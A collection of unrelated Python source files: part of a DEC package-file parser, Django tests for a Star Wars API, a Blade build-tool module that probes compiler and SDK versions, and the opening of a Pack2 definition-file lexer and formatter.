            if Line.startswith(DT.TAB_SECTION_START) and Line.endswith(DT.TAB_PRIVATE + DT.TAB_SECTION_END):
                __IsFoundPrivate = True
            if Line.startswith(DT.TAB_SECTION_START) and Line.endswith(DT.TAB_SECTION_END)\
                and not Line.endswith(DT.TAB_PRIVATE + DT.TAB_SECTION_END):
                __IsFoundPrivate = False
            if __IsFoundPrivate:
                self._Private += Line + '\r'
            if not __IsFoundPrivate:
                NewContent.append(Line + '\r')
        RawData = FileContent(DecFile, NewContent)
        _DecComments.__init__(self)
        _DecBase.__init__(self, RawData)
        self.BinaryHeadComment = []
        self.PcdErrorCommentDict = {}
        # One section parser instance per section kind; GUID/PPI/Protocol
        # share a single _DecGuid instance.
        self._Define    = _DecDefine(RawData)
        self._Include   = _DecInclude(RawData)
        self._Guid      = _DecGuid(RawData)
        self._LibClass  = _DecLibraryclass(RawData)
        self._Pcd       = _DecPcd(RawData)
        self._UserEx    = _DecUserExtension(RawData)
        #
        # DEC file supported data types (one type per section)
        #
        self._SectionParser = {
            DT.TAB_DEC_DEFINES.upper()                     :   self._Define,
            DT.TAB_INCLUDES.upper()                        :   self._Include,
            DT.TAB_LIBRARY_CLASSES.upper()                 :   self._LibClass,
            DT.TAB_GUIDS.upper()                           :   self._Guid,
            DT.TAB_PPIS.upper()                            :   self._Guid,
            DT.TAB_PROTOCOLS.upper()                       :   self._Guid,
            DT.TAB_PCDS_FIXED_AT_BUILD_NULL.upper()        :   self._Pcd,
            DT.TAB_PCDS_PATCHABLE_IN_MODULE_NULL.upper()   :   self._Pcd,
            DT.TAB_PCDS_FEATURE_FLAG_NULL.upper()          :   self._Pcd,
            DT.TAB_PCDS_DYNAMIC_NULL.upper()               :   self._Pcd,
            DT.TAB_PCDS_DYNAMIC_EX_NULL.upper()            :   self._Pcd,
            DT.TAB_USER_EXTENSIONS.upper()                 :   self._UserEx
        }
        if Parse:
            self.ParseDecComment()
            self.Parse()
            #
            # Parsing done, check required fields
            #
            self.CheckRequiredFields()
    def CheckRequiredFields(self):
        """Delegate required-field checks to every section parser; False on first failure."""
        for SectionParser in self._SectionParser.values():
            if not SectionParser.CheckRequiredFields():
                return False
        return True
    ##
    # Parse DEC file
    #
    def ParseDecComment(self):
        """Consume leading comments: PCD error comments, file header, binary header.

        Populates self.PcdErrorCommentDict, self._HeadComment and
        self.BinaryHeadComment; rewinds the raw data before real parsing.
        """
        IsFileHeader = False
        IsBinaryHeader = False
        FileHeaderLineIndex = -1
        BinaryHeaderLineIndex = -1
        TokenSpaceGuidCName = ''
        #
        # Parse PCD error comment section, e.g. '# [PcdError.<TokenSpace>]'
        # followed by '# <ErrorNumber>|<ErrorMessage>' lines.
        #
        while not self._RawData.IsEndOfFile():
            self._RawData.CurrentLine = self._RawData.GetNextLine()
            if self._RawData.CurrentLine.startswith(DT.TAB_COMMENT_SPLIT) and \
                DT.TAB_SECTION_START in self._RawData.CurrentLine and \
                DT.TAB_SECTION_END in self._RawData.CurrentLine:
                self._RawData.CurrentLine = self._RawData.CurrentLine.replace(DT.TAB_COMMENT_SPLIT, '').strip()
                if self._RawData.CurrentLine[0] == DT.TAB_SECTION_START and \
                    self._RawData.CurrentLine[-1] == DT.TAB_SECTION_END:
                    RawSection = self._RawData.CurrentLine[1:-1].strip()
                    if RawSection.upper().startswith(DT.TAB_PCD_ERROR.upper()+'.'):
                        TokenSpaceGuidCName = RawSection.split(DT.TAB_PCD_ERROR+'.')[1].strip()
                        continue
            if TokenSpaceGuidCName and self._RawData.CurrentLine.startswith(DT.TAB_COMMENT_SPLIT):
                self._RawData.CurrentLine = self._RawData.CurrentLine.replace(DT.TAB_COMMENT_SPLIT, '').strip()
                if self._RawData.CurrentLine != '':
                    if DT.TAB_VALUE_SPLIT not in self._RawData.CurrentLine:
                        self._LoggerError(ST.ERR_DECPARSE_PCDERRORMSG_MISS_VALUE_SPLIT)
                    PcdErrorNumber, PcdErrorMsg = GetSplitValueList(self._RawData.CurrentLine, DT.TAB_VALUE_SPLIT, 1)
                    PcdErrorNumber = ParsePcdErrorCode(PcdErrorNumber, self._RawData.Filename, self._RawData.LineIndex)
                    if not PcdErrorMsg.strip():
                        self._LoggerError(ST.ERR_DECPARSE_PCD_MISS_ERRORMSG)
                    self.PcdErrorCommentDict[(TokenSpaceGuidCName, PcdErrorNumber)] = PcdErrorMsg.strip()
            else:
                TokenSpaceGuidCName = ''
        # Rewind to the start of the file for the header-comment pass.
        self._RawData.LineIndex = 0
        self._RawData.CurrentLine = ''
        self._RawData.NextLine = ''
        while not self._RawData.IsEndOfFile():
            Line, Comment = CleanString(self._RawData.GetNextLine())
            #
            # Header must be pure comment
            #
            if Line != '':
                self._RawData.UndoNextLine()
                break
            # '## @file' style comment marks the start of the file header.
            if Comment and Comment.startswith(DT.TAB_SPECIAL_COMMENT) and Comment.find(DT.TAB_HEADER_COMMENT) > 0 \
                and not Comment[2:Comment.find(DT.TAB_HEADER_COMMENT)].strip():
                IsFileHeader = True
                IsBinaryHeader = False
                FileHeaderLineIndex = self._RawData.LineIndex
            #
            # Get license information before '@file'
            #
            if not IsFileHeader and not IsBinaryHeader and Comment and Comment.startswith(DT.TAB_COMMENT_SPLIT) and \
                DT.TAB_BINARY_HEADER_COMMENT not in Comment:
                self._HeadComment.append((Comment, self._RawData.LineIndex))
            if Comment and IsFileHeader and \
                not(Comment.startswith(DT.TAB_SPECIAL_COMMENT) \
                and Comment.find(DT.TAB_BINARY_HEADER_COMMENT) > 0):
                self._HeadComment.append((Comment, self._RawData.LineIndex))
            #
            # Double '#' indicates end of header comments
            #
            if (not Comment or Comment == DT.TAB_SPECIAL_COMMENT) and IsFileHeader:
                IsFileHeader = False
                continue
            # '## @BinaryHeader' style comment marks the binary header start.
            if Comment and Comment.startswith(DT.TAB_SPECIAL_COMMENT) \
                and Comment.find(DT.TAB_BINARY_HEADER_COMMENT) > 0:
                IsBinaryHeader = True
                IsFileHeader = False
                BinaryHeaderLineIndex = self._RawData.LineIndex
            if Comment and IsBinaryHeader:
                self.BinaryHeadComment.append((Comment, self._RawData.LineIndex))
            #
            # Double '#' indicates end of header comments
            #
            if (not Comment or Comment == DT.TAB_SPECIAL_COMMENT) and IsBinaryHeader:
                IsBinaryHeader = False
                break
            if FileHeaderLineIndex > -1 and not IsFileHeader and not IsBinaryHeader:
                break
        # The binary header, if present, must come after the file header.
        if FileHeaderLineIndex > BinaryHeaderLineIndex and FileHeaderLineIndex > -1 and BinaryHeaderLineIndex > -1:
            self._LoggerError(ST.ERR_BINARY_HEADER_ORDER)
        if FileHeaderLineIndex == -1:
#            self._LoggerError(ST.ERR_NO_SOURCE_HEADER)
            Logger.Error(TOOL_NAME, FORMAT_INVALID,
                         ST.ERR_NO_SOURCE_HEADER,
                         File=self._RawData.Filename)
        return
    def _StopCurrentParsing(self, Line):
        """Top-level parser never stops on a section header; always False."""
        return False
    def _ParseItem(self):
        """Parse a section header, then delegate the section body to its parser."""
        self._SectionHeaderParser()
        if len(self._RawData.CurrentScope) == 0:
            self._LoggerError(ST.ERR_DECPARSE_SECTION_EMPTY)
        SectionObj = self._SectionParser[self._RawData.CurrentScope[0][0]]
        SectionObj.BlockStart()
        SectionObj.Parse()
        return SectionObj.GetDataObject()
    def _UserExtentionSectionParser(self):
        """Parse a [UserExtensions.UserId."IdString".Arch, ...] section header."""
        self._RawData.CurrentScope = []
        ArchList = set()
        Section = self._RawData.CurrentLine[1:-1]
        Par = ParserHelper(Section, self._RawData.Filename)
        while not Par.End():
            #
            # User extension section name
            #
            Token = Par.GetToken()
            if Token.upper() != DT.TAB_USER_EXTENSIONS.upper():
                self._LoggerError(ST.ERR_DECPARSE_SECTION_UE)
            UserExtension = Token.upper()
            Par.AssertChar(DT.TAB_SPLIT, ST.ERR_DECPARSE_SECTION_UE, self._RawData.LineIndex)
            #
            # UserID
            #
            Token = Par.GetToken()
            if not IsValidUserId(Token):
                self._LoggerError(ST.ERR_DECPARSE_SECTION_UE_USERID)
            UserId = Token
            Par.AssertChar(DT.TAB_SPLIT, ST.ERR_DECPARSE_SECTION_UE, self._RawData.LineIndex)
            #
            # IdString
            #
            Token = Par.GetToken()
            if not IsValidIdString(Token):
                self._LoggerError(ST.ERR_DECPARSE_SECTION_UE_IDSTRING)
            IdString = Token
            # Arch is optional and defaults to COMMON.
            Arch = 'COMMON'
            if Par.Expect(DT.TAB_SPLIT):
                Token = Par.GetToken()
                Arch = Token.upper()
                if not IsValidArch(Arch):
                    self._LoggerError(ST.ERR_DECPARSE_ARCH)
            ArchList.add(Arch)
            if [UserExtension, UserId, IdString, Arch] not in \
                self._RawData.CurrentScope:
                self._RawData.CurrentScope.append(
                    [UserExtension, UserId, IdString, Arch]
                )
            if not Par.Expect(DT.TAB_COMMA_SPLIT):
                break
            elif Par.End():
                self._LoggerError(ST.ERR_DECPARSE_SECTION_COMMA)
        Par.AssertEnd(ST.ERR_DECPARSE_SECTION_UE, self._RawData.LineIndex)
        # 'COMMON' cannot be mixed with specific architectures.
        if 'COMMON' in ArchList and len(ArchList) > 1:
            self._LoggerError(ST.ERR_DECPARSE_SECTION_COMMON)
    ## Section header parser
    #
    # The section header is always in following format:
    #
    #     [section_name.arch<.platform|module_type>]
    #
    def _SectionHeaderParser(self):
        """Parse a '[Name.Arch, Name.Arch, ...]' header into CurrentScope."""
        if self._RawData.CurrentLine[0] != DT.TAB_SECTION_START or self._RawData.CurrentLine[-1] != DT.TAB_SECTION_END:
            self._LoggerError(ST.ERR_DECPARSE_SECTION_IDENTIFY)
        RawSection = self._RawData.CurrentLine[1:-1].strip().upper()
        #
        # Check defines section which is only allowed to occur once and
        # no arch can be followed
        #
        if RawSection.startswith(DT.TAB_DEC_DEFINES.upper()):
            if RawSection != DT.TAB_DEC_DEFINES.upper():
                self._LoggerError(ST.ERR_DECPARSE_DEFINE_SECNAME)
        #
        # Check user extension section
        #
        if RawSection.startswith(DT.TAB_USER_EXTENSIONS.upper()):
            return self._UserExtentionSectionParser()
        self._RawData.CurrentScope = []
        SectionNames = []
        ArchList = set()
        for Item in GetSplitValueList(RawSection, DT.TAB_COMMA_SPLIT):
            if Item == '':
                self._LoggerError(ST.ERR_DECPARSE_SECTION_SUBEMPTY % self._RawData.CurrentLine)
            ItemList = GetSplitValueList(Item, DT.TAB_SPLIT)
            #
            # different types of PCD are permissible in one section
            #
            SectionName = ItemList[0]
            if SectionName not in self._SectionParser:
                self._LoggerError(ST.ERR_DECPARSE_SECTION_UNKNOW % SectionName)
            if SectionName not in SectionNames:
                SectionNames.append(SectionName)
            #
            # In DEC specification, all section headers have at most two part:
            # SectionName.Arch except UserExtension
            #
            if len(ItemList) > 2:
                self._LoggerError(ST.ERR_DECPARSE_SECTION_SUBTOOMANY % Item)
            # Feature-flag PCD sections cannot be combined with other sections.
            if DT.TAB_PCDS_FEATURE_FLAG_NULL.upper() in SectionNames and len(SectionNames) > 1:
                self._LoggerError(ST.ERR_DECPARSE_SECTION_FEATUREFLAG % DT.TAB_PCDS_FEATURE_FLAG_NULL)
            #
            # S1 is always Arch
            #
            if len(ItemList) > 1:
                Str1 = ItemList[1]
                if not IsValidArch(Str1):
                    self._LoggerError(ST.ERR_DECPARSE_ARCH)
            else:
                Str1 = 'COMMON'
            ArchList.add(Str1)
            if [SectionName, Str1] not in self._RawData.CurrentScope:
                self._RawData.CurrentScope.append([SectionName, Str1])
        #
        # 'COMMON' must not be used with specific ARCHs at the same section
        #
        if 'COMMON' in ArchList and len(ArchList) > 1:
            self._LoggerError(ST.ERR_DECPARSE_SECTION_COMMON)
        if len(SectionNames) == 0:
            self._LoggerError(ST.ERR_DECPARSE_SECTION_SUBEMPTY % self._RawData.CurrentLine)
        if len(SectionNames) != 1:
            # Only PCD sections of different types may share one header.
            for Sec in SectionNames:
                if not Sec.startswith(DT.TAB_PCDS.upper()):
                    self._LoggerError(ST.ERR_DECPARSE_SECTION_NAME % str(SectionNames))
    def GetDefineSectionMacro(self):
        """Return macros defined in the [Defines] section."""
        return self._Define.GetLocalMacro()
    def GetDefineSectionObject(self):
        return self._Define.GetDataObject()
    def GetIncludeSectionObject(self):
        return self._Include.GetDataObject()
    def GetGuidSectionObject(self):
        return self._Guid.GetGuidObject()
    def GetProtocolSectionObject(self):
        return self._Guid.GetProtocolObject()
    def GetPpiSectionObject(self):
        return self._Guid.GetPpiObject()
    def GetLibraryClassSectionObject(self):
        return self._LibClass.GetDataObject()
    def GetPcdSectionObject(self):
        return self._Pcd.GetDataObject()
    def GetUserExtensionSectionObject(self):
        return self._UserEx.GetDataObject()
    def GetPackageSpecification(self):
        return self._Define.GetDataObject().GetPackageSpecification()
    def GetPackageName(self):
        return self._Define.GetDataObject().GetPackageName()
    def GetPackageGuid(self):
        return self._Define.GetDataObject().GetPackageGuid()
    def GetPackageVersion(self):
        return self._Define.GetDataObject().GetPackageVersion()
    def GetPackageUniFile(self):
        return self._Define.GetDataObject().GetPackageUniFile()
    def GetPrivateSections(self):
        """Return the raw text collected from [Private] sections."""
        return self._Private
| |
from __future__ import unicode_literals
from django.test import TestCase
from .models import (
People,
Planet,
Film,
Species,
Vehicle,
Starship
)
from .renderers import WookieeRenderer
import json
class TestAllEndpoints(TestCase):
    """ Test ALL the endpoints """
    fixtures = [
        "planets.json",
        "people.json",
        "species.json",
        "starships.json",
        "vehicles.json",
        "transport.json",
        "films.json"
    ]

    def get_query(self, url):
        """Issue a GET request against the test client and return the response."""
        return self.client.get(url)

    def _assert_search(self, base_url, term, expected, attr="name"):
        """Assert that searching narrows the result set and ranks `expected` first.

        The search result count must be strictly less than the unfiltered
        list count, and the first result's `attr` must match `expected`.
        """
        response = self.get_query("%s?search=%s" % (base_url, term))
        json_data = json.loads(response.content)
        self.assertEqual(response.status_code, 200)
        list_data = json.loads(self.get_query(base_url).content)
        self.assertLess(json_data["count"], list_data["count"])
        self.assertEqual(getattr(expected, attr), json_data["results"][0][attr])

    def _assert_detail(self, url, expected, attr="name"):
        """Assert that a detail view returns 200 and the expected object's `attr`."""
        response = self.get_query(url)
        json_data = json.loads(response.content)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(getattr(expected, attr), json_data[attr])

    def test_api_root(self):
        self.assertEqual(
            self.get_query("/api/").status_code, 200)

    def test_people_root(self):
        self.assertEqual(
            self.get_query("/api/people/").status_code, 200)

    def test_people_schema(self):
        self.assertEqual(
            self.get_query("/api/people/schema").status_code, 200)

    def test_people_search(self):
        self._assert_search(
            "/api/people/", "r2", People.objects.get(name='R2-D2'))

    def test_planets_root(self):
        self.assertEqual(
            self.get_query("/api/planets/").status_code, 200)

    def test_planets_schema(self):
        self.assertEqual(
            self.get_query("/api/planets/schema").status_code, 200)

    def test_planets_search(self):
        self._assert_search(
            "/api/planets/", "yavin", Planet.objects.get(name='Yavin IV'))

    def test_films_root(self):
        self.assertEqual(
            self.get_query("/api/films/").status_code, 200)

    def test_films_schema(self):
        self.assertEqual(
            self.get_query("/api/films/schema").status_code, 200)

    def test_films_search(self):
        self._assert_search(
            "/api/films/", "sith",
            Film.objects.get(title='Revenge of the Sith'), attr="title")

    def test_starships_root(self):
        self.assertEqual(
            self.get_query("/api/starships/").status_code, 200)

    def test_starship_schema(self):
        self.assertEqual(
            self.get_query("/api/starships/schema").status_code, 200)

    def test_starship_search(self):
        self._assert_search(
            "/api/starships/", "x1",
            Starship.objects.get(name='TIE Advanced x1'))

    def test_vehicles_root(self):
        self.assertEqual(
            self.get_query("/api/vehicles/").status_code, 200)

    def test_vehicle_schema(self):
        self.assertEqual(
            self.get_query("/api/vehicles/schema").status_code, 200)

    def test_vehicle_search(self):
        self._assert_search(
            "/api/vehicles/", "crawler",
            Vehicle.objects.get(name='Sand Crawler'))

    def test_species_root(self):
        self.assertEqual(
            self.get_query("/api/species/").status_code, 200)

    def test_species_schema(self):
        self.assertEqual(
            self.get_query("/api/species/schema").status_code, 200)

    def test_species_search(self):
        self._assert_search(
            "/api/species/", "calamari",
            Species.objects.get(name='Mon Calamari'))

    def test_people_detail(self):
        self._assert_detail("/api/people/1/", People.objects.get(pk=1))

    def test_planets_detail(self):
        self._assert_detail("/api/planets/1/", Planet.objects.get(pk=1))

    def test_films_detail(self):
        self._assert_detail(
            "/api/films/1/", Film.objects.get(pk=1), attr="title")

    def test_starships_detail(self):
        self._assert_detail("/api/starships/2/", Starship.objects.get(pk=2))

    def test_vehicles_detail(self):
        self._assert_detail("/api/vehicles/4/", Vehicle.objects.get(pk=4))

    def test_species_detail(self):
        self._assert_detail("/api/species/1/", Species.objects.get(pk=1))

    def test_etag(self):
        # A conditional GET with a matching ETag must yield 304 Not Modified.
        valid_etag = self.get_query("/api/")["ETag"]
        self.client.defaults['HTTP_IF_NONE_MATCH'] = valid_etag
        self.assertEqual(
            self.get_query("/api/").status_code, 304)

    def test_wookie_renderer(self):
        wookiee_renderer = WookieeRenderer()
        translated_data = wookiee_renderer.translate_to_wookie("swapi")
        self.assertEqual(translated_data, "cohraakah")
        translated_data = wookiee_renderer.translate_to_wookie("")
        self.assertEqual(translated_data, "")

    def test_wookie_format(self):
        # ?format=wookiee must translate both keys and values.
        wr = WookieeRenderer()
        response = self.get_query("/api/species/1/?format=wookiee")
        json_data = json.loads(response.content)
        specie = Species.objects.get(pk=1)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            wr.translate_to_wookie(specie.name),
            json_data[wr.translate_to_wookie("name")]
        )
| |
# Copyright (c) 2011 Tencent Inc.
# All rights reserved.
#
# Author: Chong Peng <michaelpeng@tencent.com>
# Date: October 20, 2011
"""
This is the blade_platform module which dues with the environment
variable.
"""
import os
import subprocess
import configparse
from blade_util import var_to_list
class SconsPlatform(object):
    """The scons platform class that it handles and gets the platform info. """
    def __init__(self):
        """Probe the local toolchain once and cache the results. """
        self.gcc_version = self._get_gcc_version('gcc')
        self.python_inc = self._get_python_include()
        self.php_inc_list = self._get_php_include()
        self.java_inc_list = self._get_java_include()
        self.nvcc_version = self._get_nvcc_version('nvcc')
        self.cuda_inc_list = self._get_cuda_include()

    @staticmethod
    def _run_shell(cmd, merge_stderr=False):
        """Run cmd through the shell and return (returncode, stdout).

        When merge_stderr is True, stderr is folded into stdout (needed for
        'java -version', which writes to stderr); otherwise stderr is
        captured and discarded.
        """
        p = subprocess.Popen(
            cmd,
            env=os.environ,
            stderr=subprocess.STDOUT if merge_stderr else subprocess.PIPE,
            stdout=subprocess.PIPE,
            shell=True,
            universal_newlines=True)
        (stdout, stderr) = p.communicate()
        return p.returncode, stdout

    @staticmethod
    def _get_gcc_version(compiler):
        """Get the gcc version, or '' if the compiler cannot be run. """
        returncode, stdout = SconsPlatform._run_shell(compiler + ' --version')
        if returncode == 0:
            # First line, third token, e.g. 'gcc (GCC) 4.8.5 ...' -> '4.8.5'.
            version_line = stdout.splitlines(True)[0]
            return version_line.split()[2]
        return ''

    @staticmethod
    def _get_nvcc_version(compiler):
        """Get the nvcc version, or '' if nvcc cannot be run. """
        returncode, stdout = SconsPlatform._run_shell(compiler + ' --version')
        if returncode == 0:
            # Release info is on the last line; sixth token is the version.
            version_line = stdout.splitlines(True)[-1]
            return version_line.split()[5]
        return ''

    @staticmethod
    def _get_python_include():
        """Get the python include dir from python-config, or '' on failure. """
        returncode, stdout = SconsPlatform._run_shell('python-config --includes')
        if returncode == 0:
            # First token looks like '-I/usr/include/pythonX.Y'; strip '-I'.
            include_line = stdout.splitlines(True)[0]
            return include_line.split()[0][2:]
        return ''

    @staticmethod
    def _get_php_include():
        """Return quoted php include dirs from php-config, or [] on failure. """
        returncode, stdout = SconsPlatform._run_shell('php-config --includes')
        if returncode == 0:
            include_line = stdout.splitlines(True)[0]
            headers = include_line.split()
            return ["'%s'" % s[2:] for s in headers]
        return []

    @staticmethod
    def _get_java_include():
        """Return JNI include dirs from JAVA_HOME, or guessed from the JDK version. """
        include_list = []
        java_home = os.environ.get('JAVA_HOME', '')
        if java_home:
            include_list.append('%s/include' % java_home)
            include_list.append('%s/include/linux' % java_home)
            return include_list
        # 'java -version' prints to stderr, so merge it into stdout.
        returncode, stdout = SconsPlatform._run_shell('java -version',
                                                      merge_stderr=True)
        if returncode == 0:
            version_line = stdout.splitlines(True)[0]
            version = version_line.split()[2].replace('"', '')
            include_list.append('/usr/java/jdk%s/include' % version)
            include_list.append('/usr/java/jdk%s/include/linux' % version)
            return include_list
        return []

    @staticmethod
    def _get_cuda_include():
        """Return cuda include dirs from CUDA_PATH, or guessed from nvcc's version. """
        include_list = []
        cuda_path = os.environ.get('CUDA_PATH')
        if cuda_path:
            include_list.append('%s/include' % cuda_path)
            include_list.append('%s/samples/common/inc' % cuda_path)
            return include_list
        returncode, stdout = SconsPlatform._run_shell('nvcc --version')
        if returncode == 0:
            version_line = stdout.splitlines(True)[-1]
            version = version_line.split()[4].replace(',', '')
            if os.path.isdir('/usr/local/cuda-%s' % version):
                include_list.append('/usr/local/cuda-%s/include' % version)
                include_list.append('/usr/local/cuda-%s/samples/common/inc' % version)
            return include_list
        return []

    def get_gcc_version(self):
        """Returns gcc version. """
        return self.gcc_version

    def get_python_include(self):
        """Returns python include. """
        return self.python_inc

    def get_php_include(self):
        """Returns a list of php include. """
        return self.php_inc_list

    def get_java_include(self):
        """Returns a list of java include. """
        return self.java_inc_list

    def get_nvcc_version(self):
        """Returns nvcc version. """
        return self.nvcc_version

    def get_cuda_include(self):
        """Returns a list of cuda include. """
        return self.cuda_inc_list
class CcFlagsManager(object):
    """The CcFlagsManager class.

    This class manages the compile warning flags.
    """
    def __init__(self, options):
        self.options = options
        # Preprocessor/compiler command line used to probe flag support.
        self.cpp_str = ''

    @staticmethod
    def _version_newer(version, baseline):
        """Return True if dotted `version` is strictly newer than `baseline`.

        Compares numerically: the previous plain string comparison wrongly
        reported '10.2' < '4.1'. Empty or unparsable versions compare as
        oldest (matching the old behavior of '' > '4.1' being False).
        """
        def _parts(ver):
            parts = []
            for piece in ver.split('.'):
                if piece.isdigit():
                    parts.append(int(piece))
                else:
                    # Stop at the first non-numeric component, e.g. '4.8.5-2'.
                    break
            return tuple(parts)
        return _parts(version) > _parts(baseline)

    def _filter_out_invalid_flags(self, flag_list, language=''):
        """filter the unsupported compilation flags. """
        flag_list_var = var_to_list(flag_list)
        xlanguage = ''
        if language:
            xlanguage = '-x' + language
        ret_flag_list = []
        for flag in flag_list_var:
            # A flag is kept only if the compiler accepts it on empty input.
            cmd_str = 'echo "" | %s %s %s >/dev/null 2>&1' % (
                      self.cpp_str, xlanguage, flag)
            if subprocess.call(cmd_str, shell=True) == 0:
                ret_flag_list.append(flag)
        return ret_flag_list

    def set_cpp_str(self, cpp_str):
        """set up the cpp_str. """
        self.cpp_str = cpp_str

    def get_flags_except_warning(self):
        """Get the flags that are not warning flags.

        Returns (flags_except_warning, linkflags).
        """
        flags_except_warning = ['-m%s' % self.options.m, '-mcx16', '-pipe']
        linkflags = ['-m%s' % self.options.m]

        # Debugging information setting
        if self.options.no_debug_info:
            flags_except_warning += ['-g0']
        else:
            if self.options.profile == 'debug':
                flags_except_warning += ['-ggdb3']
            elif self.options.profile == 'release':
                flags_except_warning += ['-g']

        # Option debugging flags
        if self.options.profile == 'debug':
            flags_except_warning += ['-fstack-protector']
        elif self.options.profile == 'release':
            flags_except_warning += ['-DNDEBUG']
        flags_except_warning += [
                '-D_FILE_OFFSET_BITS=64',
                '-D__STDC_CONSTANT_MACROS',
                '-D__STDC_FORMAT_MACROS',
                '-D__STDC_LIMIT_MACROS',
        ]

        if getattr(self.options, 'gprof', False):
            flags_except_warning.append('-pg')
            linkflags.append('-pg')

        if getattr(self.options, 'gcov', False):
            # gcc > 4.1 accepts the combined --coverage switch; older gcc
            # needs the individual flags plus an explicit -lgcov at link time.
            # Fix: numeric compare instead of string compare, which broke
            # for gcc >= 10 ('10.x' < '4.1' lexicographically).
            if self._version_newer(SconsPlatform().gcc_version, '4.1'):
                flags_except_warning.append('--coverage')
                linkflags.append('--coverage')
            else:
                flags_except_warning.append('-fprofile-arcs')
                flags_except_warning.append('-ftest-coverage')
                linkflags += ['-Wl,--whole-archive', '-lgcov',
                              '-Wl,--no-whole-archive']
        flags_except_warning = self._filter_out_invalid_flags(
                flags_except_warning)
        return (flags_except_warning, linkflags)

    def get_warning_flags(self):
        """Get the warning flags. """
        cc_config = configparse.blade_config.get_config('cc_config')
        cppflags = cc_config['warnings']
        cxxflags = cc_config['cxx_warnings']
        cflags = cc_config['c_warnings']

        filtered_cppflags = self._filter_out_invalid_flags(cppflags)
        filtered_cxxflags = self._filter_out_invalid_flags(cxxflags, 'c++')
        filtered_cflags = self._filter_out_invalid_flags(cflags, 'c')

        return (filtered_cppflags, filtered_cxxflags, filtered_cflags)
| |
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Parser for Pack2 definition files."""
import re
from makani.lib.python.pack2 import metadata
from ply import lex
from ply import yacc
# PLY's token and parser rule naming conflicts with our style.
# pylint: disable=invalid-name
class Formatter(object):
  """Pack2 code formatter.

  This class is fed tokens from the lexer and produces a canonically formatted
  version of the code.
  """
  # Maps each block type to its line terminating character.
  _new_line_char_map = {
      'bitfield8': ',',
      'bitfield16': ',',
      'bitfield32': ',',
      'enum8': ',',
      'enum16': ',',
      'enum32': ',',
      'header': ';',
      'param': ';',
      'scaled8': ',',
      'scaled16': ',',
      'scaled32': ',',
      'specialize': ';',
      'struct': ';',
  }
  # Tokens that eat whitespace after them.
  _whitespace_eaters = set([
      '[',
      '(',
  ])
  def __init__(self):
    self.preamble = ''  # Comment lines preceding the first statement.
    self.formatted = ''  # Accumulated formatted output body.
    self.first_line = True  # True until the first token is emitted.
    self.new_line = ''  # Pending line-break string; '' means none pending.
    self.block_level = 0  # Current nesting depth of {} / () blocks.
    self.indent = '  '  # Indent unit added per nesting level.
    self.new_line_char = None  # Line terminator of the current block type.
    self.eat_whitespace = False  # Swallow whitespace after '[' / '('.
    self.extra_new_line = False  # Source had a blank line before this token.
    self.prev_token = None  # Previously processed token ('\n' after newline).
    self.eat_new_line = False  # Swallow the next blank line when set.
    self.ignore_line = False  # Currently skipping an 'include' line.
  def _NextNewLine(self, token):
    """Return the nominal line break for the next statement."""
    # Top-level statements and closing braces get a blank line after them;
    # opening braces and in-block statement terminators a single newline.
    if self.block_level == 0 and token == ';':
      self.eat_new_line = True
      return '\n\n'
    if token == '}':
      self.eat_new_line = True
      return '\n\n'
    elif token == '{':
      self.eat_new_line = True
      return '\n'
    elif token == self.new_line_char:
      return '\n'
    else:
      return None
  def _ExtraNewLineAllowed(self, token):
    """Determine if an extra new line is allowed.

    Args:
      token: The token currently being added.

    Returns:
      True if an extra new line is allowed before the current statement.
    """
    if self.block_level < 1:
      return False
    if token == '}':
      return False
    if self.eat_new_line:
      return False
    return True
  def _BlockIndent(self):
    # One indent unit per nesting level.
    indent = ''
    for _ in range(0, self.block_level):
      indent += self.indent
    return indent
  def _NewLine(self, token):
    """Calculate line break.

    Calculates the appropriate line break sequence to precede the current
    token being added.

    Args:
      token: The token currently being added.

    Returns:
      A string containing the appropriate line break sequence.
    """
    if self.extra_new_line and self._ExtraNewLineAllowed(token):
      # Single blank lines are allowed within blocks to allow for logical
      # grouping of fields/values.
      new_line = '\n\n'
    else:
      new_line = self.new_line
    self.extra_new_line = False
    self.eat_new_line = False
    return new_line + self._BlockIndent()
  def AddToken(self, token, whitespace):
    """Add a token to the formatter.

    Args:
      token: The token to add.
      whitespace: The nominal whitespace to add before the token.
    """
    # Ignore include lines. These will be prepended later in alphabetical
    # order.
    if not self.prev_token or self.prev_token == '\n':
      if token == 'include':
        self.ignore_line = True
    if self.ignore_line:
      return
    if self.new_line:
      self.formatted += self._NewLine(token)
    elif not self.first_line and not self.eat_whitespace:
      self.formatted += whitespace
    self.formatted += str(token)
    self.new_line = self._NextNewLine(token)
    self.first_line = False
    self.eat_whitespace = token in self._whitespace_eaters
    if token in self._new_line_char_map:
      self.new_line_char = self._new_line_char_map[token]
    self.prev_token = token
  def AddComment(self, comment):
    """Add comment to the formatter."""
    # Special case comments at the top of files as they are allowed to come
    # before include directive.
    if self.first_line:
      self.preamble += '// ' + str(comment) + '\n'
      return
    if self.prev_token == '\n' or self.first_line:
      # A comment following a new line should be on its own line.
      self.formatted += self._NewLine('')
    else:
      # Otherwise it should be exactly two spaces after the end of line.
      self.formatted += '  '
    self.formatted += '// ' + str(comment)
    self.new_line = '\n'
  def ProcessNewLine(self, count):
    """Record a run of `count` consecutive newlines from the source."""
    self.prev_token = '\n'
    # More than one newline in a row means the source had a blank line.
    self.extra_new_line = count > 1
    self.ignore_line = False
  def EnterBlock(self):
    self.block_level += 1
  def ExitBlock(self):
    self.block_level -= 1
class ParseError(Exception):
  """Raised when parsing fails; aggregates individual error messages.

  Attributes:
    value: Summary message for the failure.
    errors: List of individual error message strings.
  """

  def __init__(self, value, errors):
    # Name the class explicitly: the previous super(self.__class__, self)
    # form recurses infinitely if this exception is ever subclassed.
    super(ParseError, self).__init__(value)
    self.errors = errors
    self.value = value

  def __str__(self):
    string = self.value + '\n'
    for e in self.errors:
      string += e
    return string
class Lexer(object):
  """Lexer for Pack2 definition files.

  Every recognized token is also fed to a Formatter, so a canonically
  formatted copy of the source is produced as a side effect of lexing.
  """
  def __init__(self, error_func):
    self.error_func = error_func  # Called with a message on illegal input.
    self.formatter = Formatter()
